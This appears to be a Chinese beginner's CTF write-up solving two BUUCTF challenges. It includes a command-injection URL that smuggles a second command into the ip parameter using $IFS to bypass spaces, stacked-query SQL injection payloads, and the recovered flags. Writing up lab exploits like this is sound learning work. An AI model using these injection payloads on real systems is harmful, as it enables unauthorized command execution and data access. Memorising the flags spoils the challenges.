[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程

学习中的DGR2026-01-23 22:39

1、[GXYCTF2019]Ping Ping Ping 1

我们直接查看flag.php，提示我们/?ip= fxck your space!，无法直接查看flag.php，需要绕过空格。

[http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php](http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php "http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php")

<!--?php

$flag = "flag{0b46a562-1574-4bfe-87ae-356928a78954}";

?-->

2、[SUCTF 2019]EasySQL 1

随便输入一个数字回显Array ( [0] => 1 )，输入其他内容回显Nonono。

猜测该系统后台代码为：select $_POST['query'] || flag from flag [1] ，且那么直接在1前面拼接*，即*,1，解得flag：

flag{4151e8ed-491a-4c8b-bc72-c076522a4936}

1;show tables; 发现Flag表

构造payload为：1;set sql_mode=PIPES_AS_CONCAT;select 1 ，相当于是将select 1 和 select flag from Flag 的结果拼接在一起，也就是 select 1;的结果拼接select flag from Flag的结果。

上一篇：wordpress开发公司推荐

下一篇：MFC扩展库BCGControlBar Pro v37.2 - 全新的VS 2026可视化管理器

热门推荐

01GitHub 镜像站点 02【OpenClaw 本地实战 Ep.3】突破瓶颈：强制修改 openclaw.json 解锁 32k 上下文记忆 03OpenClaw 使用和管理 MCP 完全指南 04Claude Code + GLM4.7 避坑指南：解决 Unable to connect to Anthropic services 05AI 规范驱动开发“三剑客”深度对比：Spec-Kit、Kiro 与 OpenSpec 实战指南 06Clawdbot部署教程：解决‘gateway token missing’授权问题的完整步骤 07AI Agent 平台横评：ZeroClaw vs OpenClaw vs Nanobot 08Window 10部署openclaw报错node.exe : npm error code 128 09网站改了域名，如何查找？10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX ：mcp-documents-reader 工具使用指南